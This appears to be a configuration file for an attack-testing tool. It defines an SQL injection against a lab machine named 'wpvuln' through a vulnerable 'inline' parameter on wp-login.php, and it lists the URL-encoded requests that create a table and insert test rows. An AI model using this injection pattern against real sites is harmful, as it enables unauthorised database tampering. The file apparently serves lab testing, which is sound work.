# This example shows a simple SQL inline injection
# against the wpvuln machine using the vulnerable 
# "inline" attribute to wp-login.php.
#
# This attack will generate the following URL requests:
# http://wpvuln/wp-login.php?inline=create+table+olive%28data+text%29+--
# http://wpvuln/wp-login.php?inline=insert+into+olive%28data%29+values%28%27hello%27%29--
# http://wpvuln/wp-login.php?inline=insert+into+olive%28data%29+values%28%27world%27%29--
#
[
    {
        "attack": "sql_inline",                             # doing an sql_inline attack
        "base_url": "http://wpvuln/wp-login.php",           # against wpvuln
        "attribute": "inline",                              # the "inline" attirbute is vulnerable
        "statements": [                                     # series of SQL statements to inject.
            "create table olive(data text) --",
            "insert into olive(data) values('hello')--",
            "insert into olive(data) values('world')--"
        ]
    }
]
